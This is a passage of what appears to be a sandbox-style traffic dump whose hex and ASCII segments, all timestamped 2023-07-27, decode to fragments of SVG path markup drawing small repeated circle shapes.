2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                  Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2053INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                  Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2069INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2101INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                  Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2117INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2133INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2149INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                  Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2165INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2181INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2197INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2213INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                  Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2229INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                  Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2245INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                  Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2261INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                  Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2277INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                  Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2293INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2373INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                  Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                  2023-07-27 19:54:07 UTC2389INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
